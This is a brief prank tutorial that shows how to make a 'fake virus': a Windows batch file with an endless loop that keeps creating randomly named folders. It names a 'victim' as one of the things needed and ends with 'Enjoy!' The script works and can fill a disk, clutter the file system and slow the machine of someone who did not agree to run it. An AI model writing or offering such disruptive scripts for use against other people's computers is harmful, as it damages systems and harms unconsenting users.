Introduction: Computer Fake Virus

Hi! Today I'll show you how to make fake virus that makes unlimited number of folders.
Things you need:
1. Computer
2. Notepad
3. Victim

Use at own risk!

Step 1: Step 1

Open Notepad.

Step 2: Step 2

Type:
@echo Off
:loop
md %random%%random%%random%%random%
goto loop

Step 3: Step 3

Save it as .bat file.
Enjoy!